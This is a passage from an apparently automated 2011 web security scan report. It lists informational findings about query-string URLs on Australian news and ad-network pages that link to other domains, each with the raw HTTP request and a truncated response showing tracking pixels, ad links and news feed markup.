http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOwzAMA78SaK4By5Rsqb9xi3oKumUK.vfSE.8AkrcA8jwyWsfjEDRKABpGU4og1mqevYTlKqZ4l6nTy1xRPxOjWb5kT3d5eKtj2_5JpjOtIohG_F7nSexEZdX19wfXYBsR&redirectURL=http://cdn4.eyewonder.com/cm/nc/12963-135748-32613-45?mpt=38ff2596-849f-413c-a1a5-af80ea37249b
http://g.ca.bid.invitemedia.com/rubicon_imp?returnType=image&key=AdImp&cost=0.678878&creativeID=147857&message=eJwVjDEOwzAMA78SaK4By5Rsqb9xi3oKumUK.vfSE.8AkrcA8jwyWsfjEDRKABpGU4og1mqevYTlKqZ4l6nTy1xRPxOjWb5kT3d5eKtj2_5JpjOtIohG_F7nSexEZdX19wfXYBsR&managed=false
http://pixel.invitemedia.com/data_sync?partner_id=77&exchange_id=9
http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment
http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=154e62c97432177b6a4bcd01

Request

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:30:37 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:30:37 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=04e8588ddb95b3c4623aa79e6; expires=Wed, 07-Sep-2011 15:30:37 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=4e8588dd3e9c0c4d453ad2c4^&12338^1&12590^1; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=62962; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2940

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

<script type="text/javascript" src="http://cdn4.eyewonder.com/cm/js/12963-135748-32613-45?mpt=38ff2596-849f-413c-a1a5-af80ea37249b&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOwzAMA78SaK4By5Rsqb9xi3oKumUK.vfSE.8AkrcA8jwyWsfjEDRKABpGU4og1mqevYTlKqZ4l6nTy1xRPxOjWb5kT3d5eKtj2_5JpjOtIohG_F7nSexEZdX19wfXYBsR%26redirectURL%3D">
</script>
<noscript>
<a href="http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOwzAMA78SaK4By5Rsqb9xi3oKumUK.vfSE.8AkrcA8jwyWsfjEDRKABpGU4og1mqevYTlKqZ4l6nTy1xRPxOjWb5kT3d5eKtj2_5JpjOtIohG_F7nSexEZdX19wfXYBsR&redirectURL=http://cdn4.eyewonder.com/cm/nc/12963-135748-32613-45?mpt=38ff2596-849f-413c-a1a5-af80ea37249b">
<img src="http://cdn4.eyewonder.com/cm/nb/12963-135748-32613-45?mpt=38ff2596-849f-413c-a1a5-af80ea37249b"
alt="Click Here" border="0">
</a>
</noscript>
<img height="1" border="0" width="1" alt="" style="display: none;" src="http://g.ca.bid.invitemedia.com/rubicon_imp?returnType=image&key=AdImp&cost=0.678878&creativeID=147857&message=eJwVjDEOwzAMA78SaK4By5Rsqb9xi3oKumUK.vfSE.8AkrcA8jwyWsfjEDRKABpGU4og1mqevYTlKqZ4l6nTy1xRPxOjWb5kT3d5eKtj2_5JpjOtIohG_F7nSexEZdX19wfXYBsR&managed=false"/>
<iframe src='http://pixel.invitemedia.com/data_sync?partner_id=77&exchange_id=9' width='1' height='1' frameborder='0' style='display: none;' scrolling='no' marginheight='0' marginwidth='0'></iframe><img src="http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/><script defer="defer" type="text/javascript">
...[SNIP]...
</script>
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=154e62c97432177b6a4bcd01" style="display: none;" border="0" height="1" width="1" alt=""/><DIV STYLE="height:0px; width:0px; overflow:hidden">
...[SNIP]...

14.67. http://pixel.invitemedia.com/rubicon_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/rubicon_sync

Issue detail

The page was loaded from a URL containing a query string:

http://pixel.invitemedia.com/rubicon_sync?publisher_user_id=f772ba986ce1d14ae944dfcb2540fa9b434bfac6&publisher_dsp_id=2101&publisher_call_type=iframe&publisher_redirecturl=http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/

The response contains the following link to another domain:

http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/?publisher_dsp_id=2101&external_user_id=435e5758-1bdb-4563-ab69-51d400bd766e&Expiration=1315836892

Request

GET /rubicon_sync?publisher_user_id=f772ba986ce1d14ae944dfcb2540fa9b434bfac6&publisher_dsp_id=2101&publisher_call_type=iframe&publisher_redirecturl=http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/ HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7856/12590
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=*

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Wed, 07 Sep 2011 14:14:52 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Wed, 07-Sep-2011 14:14:32 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 221

<html><body><img width="0" height="0" src="http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/?publisher_dsp_id=2101&external_user_id=435e5758-1bdb-4563-ab69-51d400bd766e&Expiration=1315836892"/></body>
...[SNIP]...

14.68. http://resources.news.com.au/cs/library/modules/jquery-socialise/plugins/linkedin/iframe.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://resources.news.com.au
Path:	/cs/library/modules/jquery-socialise/plugins/linkedin/iframe.html

Issue detail

The page was loaded from a URL containing a query string:

http://resources.news.com.au/cs/library/modules/jquery-socialise/plugins/linkedin/iframe.html?url=http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884

The response contains the following link to another domain:

http://platform.linkedin.com/in.js

Request

GET /cs/library/modules/jquery-socialise/plugins/linkedin/iframe.html?url=http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884 HTTP/1.1
Host: resources.news.com.au
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=YH7RvubFqqQ-XJ0QeTh

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 10 Jan 2011 00:25:34 GMT
ETag: "2da439-30f-499730199fb80"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 783
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from news.com.au:80
X-Cache-Lookup: MISS from news.com.au:80
Cache-Control: max-age=398
Expires: Wed, 07 Sep 2011 14:34:15 GMT
Date: Wed, 07 Sep 2011 14:27:37 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
<script type="text/javascript" src="http://platform.linkedin.com/in.js"></script>
...[SNIP]...

14.69. http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tap2-cdn.rubiconproject.com
Path:	/partner/scripts/rubicon/emily.html

Issue detail

The page was loaded from a URL containing a query string:

http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7725/12338

The response contains the following link to another domain:

http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif

Request

GET /partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7725/12338 HTTP/1.1
Host: tap2-cdn.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; csi15=1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1%266432%3D1; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=7725/12338; rdk2=0; ses2=12338^1; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061

Response

HTTP/1.1 200 OK
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Last-Modified: Tue, 06 Sep 2011 19:19:06 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=600
Expires: Wed, 07 Sep 2011 14:24:09 GMT
Date: Wed, 07 Sep 2011 14:14:09 GMT
Content-Length: 9192
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">



<html>
<head>
<title></title>
</head>
<
...[SNIP]...
</script>
<img src="http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>

</body>
...[SNIP]...

14.70. http://tools.themercury.com.au/feeds/feed-with-lead.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tools.themercury.com.au
Path:	/feeds/feed-with-lead.php

Issue detail

The page was loaded from a URL containing a query string:

http://tools.themercury.com.au/feeds/feed-with-lead.php?category_id=3&range=0to6&rss_name=-world-news&1801

The response contains the following link to another domain:

http://resources0.news.com.au/images/2010/06/15/1225879/957752-wine-glass.gif

Request

GET /feeds/feed-with-lead.php?category_id=3&range=0to6&rss_name=-world-news&1801 HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:17:13 GMT
Server: PWS/1.7.3.3
X-Px: ht lax-agg-n30.panthercdn.com
Cache-Control: max-age=222
Expires: Wed, 07 Sep 2011 14:18:41 GMT
Age: 134
Content-Length: 1480
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

document.write('<div class="article-extracts-box"><div class="me2-extract-box"><div class="ark-img-class"><a href="http://tools.themercury.com.au/stories/48248721-world-news.php" ><img src="http://resources0.news.com.au/images/2010/06/15/1225879/957752-wine-glass.gif" alt="Daily drink good for middle-aged women" title="" width="100" height="80" border="0"></a>
...[SNIP]...

14.71. http://tools.themercury.com.au/feeds/feed-with-lead.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tools.themercury.com.au
Path:	/feeds/feed-with-lead.php

Issue detail

The page was loaded from a URL containing a query string:

http://tools.themercury.com.au/feeds/feed-with-lead.php?category_id=55&range=0to6&1801

The response contains the following links to other domains:

http://feedproxy.google.com/~r/HeraldSunAfl/~3/3McxB5uhL-Q/story-e6frf9jf-1226131692026
http://feedproxy.google.com/~r/HeraldSunAfl/~3/iag-FXEGAK0/story-e6frf9jf-1226131745565
http://feedproxy.google.com/~r/HeraldSunAfl/~3/jElFegRfh_s/story-e6frf9jf-1226131750711
http://feedproxy.google.com/~r/HeraldSunAfl/~3/juKxsHC2Y3w/story-e6frf9jf-1226131714767
http://feedproxy.google.com/~r/HeraldSunAfl/~3/mqMEiImv-fs/story-e6frf9jf-1226131704286
http://feedproxy.google.com/~r/HeraldSunAfl/~3/xS8kKtvRZpI/story-e6frf9jf-1226131738747
http://resources0.news.com.au/images/2010/08/05/1225901/800876-brett-ratten.jpg

Request

GET /feeds/feed-with-lead.php?category_id=55&range=0to6&1801 HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:17:14 GMT
Server: PWS/1.7.3.3
X-Px: ht brf lax-agg-n30.panthercdn.com
Cache-Control: max-age=140
Expires: Wed, 07 Sep 2011 14:17:19 GMT
Age: 135
Content-Length: 1725
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

document.write('<div class="article-extracts-box"><div class="me2-extract-box"><div class="ark-img-class"><a href="http://feedproxy.google.com/~r/HeraldSunAfl/~3/3McxB5uhL-Q/story-e6frf9jf-1226131692026" target="_new"><img src="http://resources0.news.com.au/images/2010/08/05/1225901/800876-brett-ratten.jpg" alt="Relax with Ratts, says Brittain" title="" width="100" height="80" border="0"></a></div> <h4><a href="http://feedproxy.google.com/~r/HeraldSunAfl/~3/3McxB5uhL-Q/story-e6frf9jf-1226131692026" target="_new">Relax with Ratts, says Brittain</a>
...[SNIP]...
<li><a href="http://feedproxy.google.com/~r/HeraldSunAfl/~3/mqMEiImv-fs/story-e6frf9jf-1226131704286" class="ark-bullet" target="_new">Adelaide crows about youth</a>
...[SNIP]...
<li><a href="http://feedproxy.google.com/~r/HeraldSunAfl/~3/iag-FXEGAK0/story-e6frf9jf-1226131745565" class="ark-bullet" target="_new">Hurley risks stress fracture to play</a>
...[SNIP]...
<li><a href="http://feedproxy.google.com/~r/HeraldSunAfl/~3/jElFegRfh_s/story-e6frf9jf-1226131750711" class="ark-bullet" target="_new">Cats the \'best team\' of all</a>
...[SNIP]...
<li><a href="http://feedproxy.google.com/~r/HeraldSunAfl/~3/xS8kKtvRZpI/story-e6frf9jf-1226131738747" class="ark-bullet" target="_new">For the love of the jumper</a>
...[SNIP]...
<li><a href="http://feedproxy.google.com/~r/HeraldSunAfl/~3/juKxsHC2Y3w/story-e6frf9jf-1226131714767" class="ark-bullet" target="_new">Mick must solve Jolly problem: Lethal</a>
...[SNIP]...

14.72. http://weather.news.com.au/widgets/local/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://weather.news.com.au
Path:	/widgets/local/

Issue detail

The page was loaded from a URL containing a query string:

http://weather.news.com.au/widgets/local/?id=587

The response contains the following links to other domains:

http://data.weatherzone.com.au/javascript/jquery/jquery-1.latest.min.js
http://weather.themercury.com.au/tas/lower-derwent/hobart

Request

GET /widgets/local/?id=587 HTTP/1.1
Host: weather.news.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sopsview=1; NetInsightSessionID=1; UnicaNIODID=YH7RvubFqqQ-XJ0QeTh

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_jk/1.2.31
Vary: Accept-Encoding
Content-Length: 4189
Content-Type: text/html
Cache-Control: max-age=30
Expires: Wed, 07 Sep 2011 14:18:52 GMT
Date: Wed, 07 Sep 2011 14:18:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>

       <tit
...[SNIP]...
<meta name="description" content="Local weather." />

       <script type="text/javascript" src="http://data.weatherzone.com.au/javascript/jquery/jquery-1.latest.min.js"></script>
...[SNIP]...
<span class="right-floated link"><a href="http://weather.themercury.com.au/tas/lower-derwent/hobart" target="_parent">Hobart, TAS Local Weather</a>
...[SNIP]...

14.73. http://weather.news.com.au/widgets/monthly-almanac/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://weather.news.com.au
Path:	/widgets/monthly-almanac/

Issue detail

The page was loaded from a URL containing a query string:

http://weather.news.com.au/widgets/monthly-almanac/?id=594

The response contains the following links to other domains:

http://data.weatherzone.com.au/javascript/jquery/jquery-1.latest.min.js
http://weather.themercury.com.au/tas/lower-derwent/hobart

Request

GET /widgets/monthly-almanac/?id=594 HTTP/1.1
Host: weather.news.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sopsview=1; NetInsightSessionID=1; UnicaNIODID=YH7RvubFqqQ-XJ0QeTh

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_jk/1.2.31
Vary: Accept-Encoding
Content-Length: 2510
Content-Type: text/html
Cache-Control: max-age=30
Expires: Wed, 07 Sep 2011 14:18:52 GMT
Date: Wed, 07 Sep 2011 14:18:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>

       <tit
...[SNIP]...
<meta name="description" content="Monthly almanac." />

       <script type="text/javascript" src="http://data.weatherzone.com.au/javascript/jquery/jquery-1.latest.min.js"></script>
...[SNIP]...
<span class="right-floated link"><a href="http://weather.themercury.com.au/tas/lower-derwent/hobart" target="_parent">Detailed Hobart Weather</a>
...[SNIP]...

14.74. http://weather.news.com.au/widgets/radar/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://weather.news.com.au
Path:	/widgets/radar/

Issue detail

The page was loaded from a URL containing a query string:

http://weather.news.com.au/widgets/radar/?id=597

The response contains the following links to other domains:

http://data.weatherzone.com.au/javascript/jquery/jquery-1.latest.min.js
http://data.weatherzone.com.au/javascript/twc/animator-1.latest.min.js
http://weather.themercury.com.au/radar/tas/hobart

Request

GET /widgets/radar/?id=597 HTTP/1.1
Host: weather.news.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sopsview=1; NetInsightSessionID=1; UnicaNIODID=YH7RvubFqqQ-XJ0QeTh

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_jk/1.2.31
Vary: Accept-Encoding
Content-Length: 4046
Content-Type: text/html
Cache-Control: max-age=30
Expires: Wed, 07 Sep 2011 14:18:53 GMT
Date: Wed, 07 Sep 2011 14:18:23 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>

       <tit
...[SNIP]...
<meta name="description" content="Weather radar." />

       <script type="text/javascript" src="http://data.weatherzone.com.au/javascript/jquery/jquery-1.latest.min.js"></script>
       <script type="text/javascript" src="http://data.weatherzone.com.au/javascript/twc/animator-1.latest.min.js"></script>
...[SNIP]...
<span class="right-floated link"><a href="http://weather.themercury.com.au/radar/tas/hobart" target="_parent">Hobart radar</a>
...[SNIP]...

14.75. http://weather.news.com.au/widgets/satellite/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://weather.news.com.au
Path:	/widgets/satellite/

Issue detail

The page was loaded from a URL containing a query string:

http://weather.news.com.au/widgets/satellite/?id=592

The response contains the following links to other domains:

http://data.weatherzone.com.au/javascript/jquery/jquery-1.latest.min.js
http://data.weatherzone.com.au/javascript/twc/animator-1.latest.min.js
http://weather.themercury.com.au/satellite/tas

Request

GET /widgets/satellite/?id=592 HTTP/1.1
Host: weather.news.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sopsview=1; NetInsightSessionID=1; UnicaNIODID=YH7RvubFqqQ-XJ0QeTh

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_jk/1.2.31
Vary: Accept-Encoding
Content-Length: 3954
Content-Type: text/html
Cache-Control: max-age=30
Expires: Wed, 07 Sep 2011 14:18:53 GMT
Date: Wed, 07 Sep 2011 14:18:23 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>

       <tit
...[SNIP]...
<meta name="description" content="Satellite." />

       <script type="text/javascript" src="http://data.weatherzone.com.au/javascript/jquery/jquery-1.latest.min.js"></script>
       <script type="text/javascript" src="http://data.weatherzone.com.au/javascript/twc/animator-1.latest.min.js"></script>
...[SNIP]...
<span class="right-floated link"><a href="http://weather.themercury.com.au/satellite/tas" target="_parent">TAS Satellite</a>
...[SNIP]...

14.76. http://web.adblade.com/imps.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://web.adblade.com
Path:	/imps.php

Issue detail

The page was loaded from a URL containing a query string:

http://web.adblade.com/imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=83&output=html&tpUrl=http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com

The response contains the following links to other domains:

http://b.scorecardresearch.com/p?c1=8&c2=6864322&c3=&c4=&c5=&c6=&c10=&c15=&cj=1
http://edge.quantserve.com/quant.js
http://pixel.quantserve.com/pixel/p-b8GPCpJxfqYm2.gif
http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http://web.adblade.com/clicks.php?appId=3695&zid=4e2ec8f4b8f99&adId=29709&pos=3&impt=1315404854.32171791490&zoneId=83
http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http://www.smarterlifestyles.com/2010/06/01/the-advantages-of-buying-penny-stocks/?fc_id=27698&fc_app_id=3695
http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http://www.smarterlifestyles.com/2011/09/07/multiply-your-money/?fc_id=30752&fc_app_id=3695
http://www.smarterlifestyles.com/

Request

GET /imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=83&output=html&tpUrl=http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com HTTP/1.1
Host: web.adblade.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __sgs=E9sOpfn38Vyk9ev7mYc4l253DJxNrTy2kDg72IC7%2BsE%3D; __tuid=3269600676904920279; __qca=P0-1392796123-1315103186293

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Set-Cookie: __impt=1315404854.32171791490; expires=Thu, 08-Sep-2011 14:14:14 GMT; path=/
Content-type: text/html
Date: Wed, 07 Sep 2011 14:14:14 GMT
Server: lighttpd/1.4.23
Content-Length: 9397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; ch
...[SNIP]...
<td class="zoneSsponsoredText83" ><a href="http://www.smarterlifestyles.com/" target="_blank"><img style="border:0;" height="12" alt="SmarterLifestyles" title="SmarterLifestyles" src="http://static.cdn.adblade.com/img/smarterlifestyles-logo.gif"/>
...[SNIP]...
<td id="adImage" rowspan="2" class="adImage1_83" valign="top" align="left">
<a href="http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http://www.smarterlifestyles.com/2010/06/01/the-advantages-of-buying-penny-stocks/?fc_id=27698&fc_app_id=3695" target="_blank">
<img src="http://static.cdn.adblade.com/banners/images/80x60/6073_4dd52b7c4857d.jpg" border="0" />
...[SNIP]...
<div class="descriptionScrool1_83">
<a class="adDescription1_83" id="adDescription0_0" href="http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http://www.smarterlifestyles.com/2010/06/01/the-advantages-of-buying-penny-stocks/?fc_id=27698&fc_app_id=3695" target="_blank">
Penny stocks are the secret to buying happiness during a recession...</a>
...[SNIP]...
